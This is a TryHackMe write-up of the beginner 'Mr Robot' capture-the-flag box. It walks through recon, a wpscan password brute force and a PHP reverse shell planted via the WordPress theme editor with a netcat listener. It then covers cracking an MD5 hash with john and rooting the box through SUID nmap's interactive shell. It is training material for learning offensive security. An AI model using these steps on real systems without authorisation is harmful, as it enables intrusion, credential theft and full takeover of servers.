THM Writeup – Mr Robot CTF
Based on the Mr. Robot show, can you root this box?
Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?
Credit to Leon Johnson for creating this machine.
Add IP address to your hosts file:
echo '10.10.178.185 robot.thm' >> /etc/hostsScan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv robot.thm
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
443/tcp open https syn-ack ttl 64Get more details about open ports:
nmap -T4 -A -p 80,443 robot.thm
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03We have ports 80 and 443 open – a web application running under Apache web server.
Check both ports – port 80 first – browse to http://robot.thm/:
There is very cool application.
Now port 443 – browse to https://robot.thm
It looks like exactly the same web application, just here it runs on port 443.
Looking for first key
Check the source code of the web site – view page source:
At this point, I checked (tried) all those commands the web site provided us, but found really nothing of interest.
Directory bruteforce the web application:
root@ip-10-10-40-183:~# gobuster dir -u http://robot.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
/index.php (Status: 301)
/index.html (Status: 200)
/images (Status: 301)
/blog (Status: 301)
/rss (Status: 301)
/sitemap (Status: 200)
/login (Status: 302)
/0 (Status: 301)
/feed (Status: 301)
/video (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/wp-login (Status: 200)
/wp-login.php (Status: 200)
/css (Status: 301)
/rss2 (Status: 301)
/license (Status: 200)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/wp-register.php (Status: 301)
/Image (Status: 301)
/wp-rss2.php (Status: 301)
/rdf (Status: 301)
/page1 (Status: 301)
/readme (Status: 200)
/readme.html (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
Progress: 2030 / 220561 (0.92%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================As you can see I stopped the scan, because I had alread found what I wanted – is looks like it is a WordPress application with some interesting sites/files – /admin, /login, /robots.txt
Ok, now browse to http://robot.thm/login
Yes, it is WordPress application, let’s gather more information:
root@ip-10-10-40-183:~# wpscan --url robot.thm -e vp,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.7
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://robot.thm/ [10.10.178.185]
[+] Started: Fri Feb 18 12:37:20 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://robot.thm/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://robot.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] The external WP-Cron seems to be enabled: http://robot.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://robot.thm/e7a3a7b.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://robot.thm/e7a3a7b.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://robot.thm/wp-content/themes/twentyfifteen/
| Last Updated: 2022-01-25T00:00:00.000Z
| Readme: http://robot.thm/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://robot.thm/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://robot.thm/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] No Users Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Fri Feb 18 12:37:35 2022
[+] Requests Done: 73
[+] Cached Requests: 6
[+] Data Sent: 14.682 KB
[+] Data Received: 17.923 MB
[+] Memory used: 238.102 MB
[+] Elapsed time: 00:00:15We found out some interesting information:
- there is
robots.txtfile – we’ll check that soon - XML-RPC is enabled
- it is vulnerable/insecure WordPress version 4.3.1
- theme used is
twentyfifteen
Check /admin site now – browsing to http://robot.thm/admin, we are redirected to http://robot.thm/admin/index.html – the site is still refreshing, view the page source:
It is the same web site (source) like before and I think we are not allowed to enter /admin/index.html because we don’t have the correct IP address…
Now check /robots.txt – browse to http://robot.thm/robots.txt
Hmmm, this is something we are interested in – it looks like we found the first key.
Open key-1-of-3.txt file by browsing to http://robot.thm/key-1-of-3.txt
Looking for second key
To download fsocity.dic browse to http://robot.thm/fsocity.dic
XML-RPC is enabled so we can try to find login password by using dictionary we found:
root@ip-10-10-40-183:~# wpscan --url robot.thm --usernames elliot --passwords fsocity.dic --max-threads 50I have to admit, first I ran this command with username mrrobot and as you can expect I didn’t reveal the password. Then I remembered the name elliot 🙂
Go to http://robot.thm/login and login with username elliot and password we’ve just obtained:
Check what role is our user in – click Users:
Great news – our user is administrator.
We know that theme editors can be utilized to upload php reverse shells, we’ll upload one to the 404.php page:
root@ip-10-10-40-183:~# cp /usr/share/webshells/php/php-reverse-shell.php 404.php
root@ip-10-10-40-183:~# nano 404.phpSo we copied the PHP reverse shell to our current working directory as 404.php, now open it and modify the IP address ($ip) and PORT ($port) parameters:
In the WP administration go to Appearance > Editor > 404 Template (on the right):
Copy the content of your 404.php, paste it as template and click Upload File:
Start netcat listener:
nc -lnvp 4242Browse to http://robot.thm/wp-content/themes/twentyfifteen/404.php (or http://robot.thm/?p=404.php) and we received reverse shell:
Note: http://robot.thm/?p=404.php did not work this time…
Upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 24 columns 80
export TERM=xterm-256color
resetLook around – find the second key:
daemon@linux:/$ ls -lA /home/
total 4
drwxr-xr-x 2 root root 4096 Nov 13 2015 robot
daemon@linux:/$ ls -lA /home/robot/
total 8
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5We found the second key, however we are not allowed to read it – only robot user has permissions to read it.
Anyway we found an interesting file named password.raw-md5, let’s check it out:
daemon@linux:/$ cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13bThat should be the robot’s password hash.
Copy the hash to a file on your attacking machine and try to crack it:
root@ip-10-10-40-183:~# echo 'c3fcd3d76192e4007dfb496cca67e13b' > hash
root@ip-10-10-40-183:~# john -w=/usr/share/wordlists/rockyou.txt --format=raw-md5 hash
[REDACTED] (?)Great, we have robot’s password, so switch to robot user:
daemon@linux:/$ su robot
Password:
robot@linux:/$Read the second key:
robot@linux:/$ cat /home/robot/key-2-of-3.txt
[REDACTED]Looking for third key
Now, I guess, we need to be root to be able to read the third key – so we have to find privilege escation vector.
What robot user can do with sudo:
robot@linux:/$ sudo -l
[sudo] password for robot:
Sorry, user robot may not run sudo on linux.Check scheduled tasks:
robot@linux:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
21 * * * * bitnami cd /opt/bitnami/stats && ../agent.bin --run -DCheck executables with SUID bit set:
robot@linux:/$ find / -type f -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chownNah, finally we found something interesting – SUID bit set on nmap.
Check GTFOBins:
Ok, this is the way we can write to a file with elevated privileges, but we need to read the key…
First we have to run nmap in interactive mode and start a shell:
robot@linux:/$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)As we can see our effective permissions are root.
So find the third key and read it:
# ls /root
firstboot_done key-3-of-3.txt
# cat /root/key-3-of-3.txt
[REDACTED]Do you like this writeup? Check out other THM Writeups.